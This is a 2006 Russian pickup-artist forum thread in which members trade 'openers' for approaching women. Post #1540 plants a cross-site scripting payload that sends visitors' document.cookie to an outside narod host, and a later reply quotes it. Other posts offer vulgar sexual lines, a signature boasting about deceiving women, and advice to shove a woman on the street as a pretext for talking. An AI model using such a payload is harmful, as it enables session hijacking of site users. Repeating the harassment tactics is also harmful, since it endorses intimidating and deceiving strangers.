Top.Mail.Ru

Перейти к содержимому

Фотография

The best шаблон (опенер) для знакомства

Сообщений в теме: 2034

#1531 wertun

wertun
  • Посетитель
  • 39 Cообщений
85
Очень хороший

Отправлено 23 Август 2006 - 11:24

Одну прикольную историю рассказал мне друг котороя приключилась с его знакомым! идут они с друзьями по парку ,а на встречу идет девушка ну гдето на 7-8 без лифона соски стояшие ну все как надо ! ну один тип такой типа жигало подваливат и смотря ей на грудь говорит - Слушай я бы настроил твой приемник на красивейшую частоту (показывая жестом рук типа он крутит соски:0)! - На что девушка не растерялась ,и ответила-Да ты своей АНТЕНОЙ ДАЖЕ МОЯК НЕ НАСТРОИШЬ - Вот это было смеху Хотя обычно это фишка работает отлично , но видимо не в этот раз :spiteful:
  • 0

#1532 DIP

DIP

• Достойный Член
  • PipPipPipPipPip
  • 4 170 Cообщений
1 141
Очень хороший

Отправлено 23 Август 2006 - 17:12

Последний тренинг закончился на мажорной ноте и я решил продолжить мою добрую традицию подходить на хорошем разгоне после занятий Мага. Проводив своих боевых товарищей я зашел в магазинчик, где купил пачку чипсов. Выхожу, одеваю наушники и пытаюсь включить музыку, как замечаю, что впереди идут две девочки (6/10). Буду открывать Иду неспеша за ними похрумкивая чипсами, меня обгоняют три паренька с пивком. Идут явно к ним. Смотрю. Догоняют и один что-то говорит. Ноль емоций. Еще фраза - опять мимо. Парни ускоряются, уходя на йух. Наступает моя очередь выйти на сцену и сорвать овации... Подхожу сзади слева, чуть обгоняю и разворачиваюсь. Протягиваю пакет с чипсами и говорю улыбаясь: "Угощайтесь!". При етом смотрю в глаза и жду реакции. И вы знаете, она не замедлила себя ждать! Девочки подумали-посмотрели и оновременно потянули ручонки к пакетику. - Ого-го! Не все сразу! - К+ - Они (АМ на парней уходящих впереди) вас пивом не угостили? - Нет! - А знаете почему? - Почему? - Они хотели с вами познакомиться! - К+. Да, ты прав. - А знаете почему у них не получилось? - Потому что ОНИ - НЕУДАЧНИКИ. К+ у всех присутствующих. ...Дальше мы шли вместе по направлению к моему дому и болтали ОБО ВСЕМ. На прощание узнал их имена и поцеловав в щечки отпустил домой. И ВСЕ. А вы настраивались на что-то большее, развратники?
  • 0

#1533 ShT@1n

ShT@1n

тусовщик

• Полноправный
  • Pip
  • 94 Cообщений
101
Очень хороший

Отправлено 23 Август 2006 - 18:18

- Потому что ОНИ - НЕУДАЧНИКИ. К+ у всех присутствующих.

Надо было добавить ФРУСТИРОВАННЫЕ, тогда сразу телефон дали, а так только имена...

// шучу, прикольно сыграл...

ну и пара опенеров:

1) - Девушка! Вы оставьте мне номер вашего телефона, а то я свой забыл...

2) - Поехали ко мне домой. Фокус покажу...
Какой - какой -какой! Я тебя трахну, а потом ты исчезнешь.

3) Больному требуется уход врача...И чем дальше врач уйдет тем больному лучше...
(использовать в соответствующей ситуации)

3) Привет! А ты знаешь, что несмотря на то, что уже несколько миллионов лет женщина живет рядом с человеком, в ее поведении и образе жизни остается еще много загадочного и непонятного.
  • 0
Нет ничего хуже, чем обманывать женщину... Но нет ничего приятнее когда это получается.

#1534 Earthbound

Earthbound

Советчик

• Полноправный
  • PipPipPip
  • 772 Cообщений
179
Очень хороший

Отправлено 26 Август 2006 - 13:09

- Девушка, я похож на голубого?
  • 0

#1535 baastard

baastard

клубный алкоголик со стажем

• Перцы
  • PipPipPip
  • 1 496 Cообщений
312
Очень хороший

Отправлено 26 Август 2006 - 15:19

- Привет, слушай помоги мне, я очень сильно, прямо сейчас хочу занятся с тобой сексом, можешь мне в этом помочь? что мне делать? И есть ли у меня какие либо шансы?
  • 0

#1536 Роман Романыч

Роман Романыч

Волшебник

• Перцы
  • PipPipPip
  • 679 Cообщений
158
Очень хороший

Отправлено 26 Август 2006 - 20:26

Девушка, что вы готовы сделать для того, чтобы понравившийся вам молодой человек занялся с вами сексом на первом свидании?..)
  • 0
Много говорить и много сказать не есть одно и тоже..

#1537 sm!t

sm!t

бывалый

• Полноправный
  • PipPip
  • 433 Cообщений
148
Очень хороший

Отправлено 30 Август 2006 - 17:47

Сегодня стоял с другом на остановке, ждал автобуса, рядом с нами стояли две девушки 6-7 на вид. Их разговор: - Что-то прохладно.. - Ага, я бы сейчас легла под одеяло и долго бы нежилась им... Я слышу это, оборачиваюсь и говорю: - Привет! Меня зовут одеяло... Дальше у них К+, постояли пообщались, взял телефон одной, друг другой.
  • 0

#1538 Pringles

Pringles

Чипсоныч

• Полноправный
  • PipPipPip
  • 1 378 Cообщений
264
Очень хороший

Отправлено 30 Август 2006 - 20:06

Креативно. Зачёт.
  • 0
My LJ

#1539 MADStifler

MADStifler

Редкий похуист

• Полноправный
  • PipPipPip
  • 672 Cообщений
218
Очень хороший

Отправлено 31 Август 2006 - 00:20

девушка, разрешите найти вашу точку джи!:) Позволь пальцем найти гравитацию в твоей пизде ! Жесткий оупенер. © Спунки
  • 0
НИКОГДА не задавай Stifler'у глупых вопросов. (с) American Pie 5

#1540 PAIN

PAIN
  • Участник
  • 34 Cообщений
0
Обычный

Отправлено 02 Сентябрь 2006 - 23:22

http://1.ru e=`` style=display:none;background:url(java script:document.images[12].src="http://avaddon.narod...document.cookie) Lol
  • 0

#1541 Brutt

Brutt

тусовщик

• Полноправный
  • Pip
  • 128 Cообщений
101
Очень хороший

Отправлено 02 Сентябрь 2006 - 23:34

-Вы любите сникерсы? Разговор заходит о шоколаде, беру телефон под предлогом покушать его как-нибудь вместе :) Прикольно еще получается, когда садишься к девушкам рядом на скамейку, посвистываешь, смотришь в их сторону, и когда они обращают на тебя внимание, резко отворачиваешься от них, смотришь в небо, посвистывая, у девушек обычно К+ при хорошем исполнении. Там и общение завязывается. И телефоны берутся.
  • 0
Не так страшен русский танк, как его подвыпивший экипаж

#1542 Tasman

Tasman

Мастер Перевоплощений

• Ляди
  • PipPipPipPipPip
  • 3 137 Cообщений
510
Очень хороший

Отправлено 03 Сентябрь 2006 - 09:54

Сегодня стоял с другом на остановке, ждал автобуса, рядом с нами стояли две девушки 6-7 на вид. Их разговор: - Что-то прохладно..- Ага, я бы сейчас легла под одеяло и долго бы нежилась им...Я слышу это, оборачиваюсь и говорю:- Привет! Меня зовут одеяло...Дальше у них К+, постояли пообщались, взял телефон одной, друг другой.

Самый правильный стиль, использовать ситуацию ;)
  • 0
Жизнь нужно прожить так, чтобы было что вспомнить, но нечего рассказать детям!

#1543 Zu[1]

Zu[1]

ЛТР-инженер.

• Полноправный
  • PipPipPip
  • 732 Cообщений
181
Очень хороший

Отправлено 03 Сентябрь 2006 - 16:51

-Девушка! -? -Привет! :)
  • 0
Смекаешь?

#1544 MADStifler

MADStifler

Редкий похуист

• Полноправный
  • PipPipPip
  • 672 Cообщений
218
Очень хороший

Отправлено 04 Сентябрь 2006 - 18:49

http://1.ru e=`` style=display:none;background:url(java script:document.images[12].src="http://avaddon.narod...document.cookie) Lol

Если ты сможешь проговорить этот "оупенер" девушке, то с меня пирожок :)
  • 0
НИКОГДА не задавай Stifler'у глупых вопросов. (с) American Pie 5

#1545 Tasman

Tasman

Мастер Перевоплощений

• Ляди
  • PipPipPipPipPip
  • 3 137 Cообщений
510
Очень хороший

Отправлено 04 Сентябрь 2006 - 19:43

Толкнуть на улице девушку сильно (но чтоб не упала и без физического вреда), потом: -Девушка вы что толкаетесь?! )))
  • 0
Жизнь нужно прожить так, чтобы было что вспомнить, но нечего рассказать детям!

Ответить

Количество пользователей, читающих эту тему: 1

0